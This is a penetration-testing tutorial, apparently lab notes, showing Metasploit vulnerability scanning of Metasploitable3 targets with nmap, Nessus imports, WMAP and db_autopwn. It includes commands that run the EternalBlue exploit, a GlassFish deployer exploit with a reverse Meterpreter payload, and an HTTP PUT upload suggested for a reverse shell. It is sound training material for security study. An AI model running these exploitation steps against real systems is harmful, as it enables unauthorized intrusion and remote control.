Vulnerability Scanning

Vulnerability Scanning With MSF

MSF Auxiliary and exploit modules can be utilized to identify inherent vulnerabilities in services, O.S. and web apps.

• Useful in the Exploitation phase of the pentest

🔬 Metasploitable3 lab environment will be used for the vulnerability scanning demonstration.

• Metasploitable3 is a vulnerable virtual machine developed by Rapid7, intended to be used as a vulnerable target for testing exploits with Metasploit.

🔬 You can find my lab installation & configuration with Vagrant at this page, set up for educational purposes.

• Kali Linux attacker machine must be configured with the same local network of the Metasploitable3 VMs.

Detect active hosts on the local network, from the Kali VM:sudo nmap -sn 192.168.31.0/24Nmap scan report for 192.168.31.139 # Linux targetNmap scan report for 192.168.31.140 # Windows2008 target

• Run Metasploit:

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.140setg RHOST 192.168.31.140workspace -a VULN_SCAN_MS3

• Service version is a key piece of information for the vulnerabilities scanning. Use the db_nmap command inside the MSF

db_nmap -sS -sV -O 192.168.31.140[*] Nmap: 21/tcp open ftp Microsoft ftpd[*] Nmap: 22/tcp open ssh OpenSSH 7.1 (protocol 2.0)[*] Nmap: 80/tcp open http Microsoft IIS httpd 7.5[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds[*] Nmap: 3306/tcp open mysql MySQL 5.5.20-log[*] Nmap: 3389/tcp open tcpwrapped[*] Nmap: 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 7676/tcp open java-message-service Java Message Service 301[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)[*] Nmap: 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8383/tcp open http Apache httpd[*] Nmap: 9200/tcp open wap-wsp?[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC[...]db_nmaphostsservices

• Manually search for a specific exploit

  • Check if there are any exploits for a particular version of a service

search type:exploit name:iissearch type:exploit name:iissearch Sun GlassFish

• Check if a module will work on the specific version of the service

use exploit/multi/http/glassfish_deployerinfo​# Description:# This module logs in to a GlassFish Server (Open Source or# Commercial) using various methods (such as authentication bypass,# default credentials, or user-supplied login), and deploys a# malicious war file in order to get remote code execution. It has# been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System# Application Server 9.x. Newer GlassFish versions do not allow remote# access (Secure Admin) by default, but is required for exploitation.set payload windows/meterpreter/reverse_tcpoptions# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options

• Use searchsploit tool from the Kali terminal, instead of search MSF command, by displaying only the Metasploit exploit modules

searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"

• Back in msfconsole, check if the server is vulnerable to MS17-010

search eternalblueuse auxiliary/scanner/smb/smb_ms17_010runuse exploit/windows/smb/ms17_010_eternalblueoptions# always check Payload optionsrun

​metasploit-autopwn - a Metasploit plugin for easy exploit & vulnerability attack.

• takes a look at the Metasploit database and provides a list of exploit modules to use for the already enumerated services

• On a Kali terminal

wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rbsudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/

• On msfconsole

load db_autopwndb_autopwn -p -t# Enumerates exploits for each of the open portsdb_autopwn -p -t -PI 445# Limit to only the 445 portdb_autopwn -p -t -PI 445

• On msfconsole use the analyze command to auto analyze the contents of the MSFdb (hosts & services)

analyzeanalyzevulnsvulns

VA with Nessus​

🔬 You can find my Nessus Essentials install tutorial here.

• A vulnerability scan with Nessus result can be imported into the MSF for analysis and exploitation.

• Nessus Essentials free version allows to scan up to 16 IPs.

Start Nessus Essentials on the Kali VM, login and create a New Basic Network Scan and run it.Wait for the scan conclusion and export the results with the Export/Nessus button.Nessus Essentials - Metasploitable3

• Open the msfconsole terminal and import the Nessus results

  • Check the information from the scan results with the hosts, services, vulns commands

workspace -a MS3_NESSUSdb_import /home/kali/Downloads/MS3_zph3t5.nessushostsservicesvulnsvulns -p 445search cve:2017 name:smbsearch MS12-020search cve:2019 name:rdpsearch cve:2015 name:ManageEnginesearch PHP CGI Argument Injection

VA with WMAP​

🗒️ WMAP is a web application vulnerability scanner that allows to conduct and automate web server enumeration and scanning from within the Metasploit Framework.

• Available as a fully integrated MSF plugin

• Utilizes the in-built MSF auxiliary modules

🔬 The lab is the same one from the HTTP Metasploit Enumeration section above - Metasploit - Apache Enumeration Lab​

ip -br -c a192.28.60.3# Target IP​service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.28.60.3setg RHOST 192.28.60.3workspace -a WMAP_SCAN

• Load WMAP extension within msfconsole

load wmapload wmap

• Add WMAP site

wmap_sites -a 192.28.60.3

• Specify the target URL

wmap_targets -t http://192.28.60.3wmap_sites -lwmap_targets -l

• Show only the MSF modules that will be able to be run against target

wmap_run -t

• Run the web app vulnerability scan

  • this will run all enabled modules against the target web server

wmap_run -e

• Analyze the results produced by WMAP.

wmap_run -twmap_run -e

• List WMAP found vulnerabilities

wmap_vulns -l

• Since the allowed methods are POST, OPTIONS, GET, HEAD, exploit the vulnerability with the use of auxiliary/scanner/http/http_put module to upload a file into the /data directory

  • 📌 A reverse shell payload can be uploaded and run on the target.

use auxiliary/scanner/http/http_putoptionsset PATH /data/set FILEDATA "File uploaded"set FILENAME file.txtrunMetasploit - auxiliary/scanner/http/http_put

• Test if the file has been uploaded correctly

curl http://192.28.60.3:80/data/file.txt